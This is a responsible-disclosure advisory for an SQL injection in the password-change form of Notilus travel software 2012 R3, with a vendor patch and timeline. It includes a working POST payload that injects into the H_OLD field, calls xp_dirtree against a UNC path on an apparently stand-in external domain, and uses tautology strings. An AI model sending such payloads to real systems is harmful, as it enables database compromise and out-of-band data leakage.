Notilus Travel Solution Software 2012 R3 - SQL Injection

Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Vulnerable Versions: 2012 R3
Tested Version: 2012 R3
Advisory Publication: 03/06/2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor: DIMO Software


Product & Version:
Notilus travel solution software v2012 R3


Vendor URL & Download:
http://www.notilus.com/


Product Description:
"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."


(2) Vulnerability Details:
--------------------------
The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.

Proof of concept:

POST TO /company/profilv4/Password.aspx

Vulnerable parameter: H_OLD

Payload:
ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27




(3) Advisory Timeline:
----------------------
15/02/16 - First Contact: vendor requests details of vulnerability
03/03/16 - Follow up to vendor to inquire about availability of a fix.
03/03/16 - vendor responds that fix will be available 16/03/16.
16/03/16 - Vendor releases patch.




(4)Solution:
------------
Patch to latest available 2012 R3 branch or upgrade to version 2016.


(5) Credits:
------------
Discovered by Alex Haynes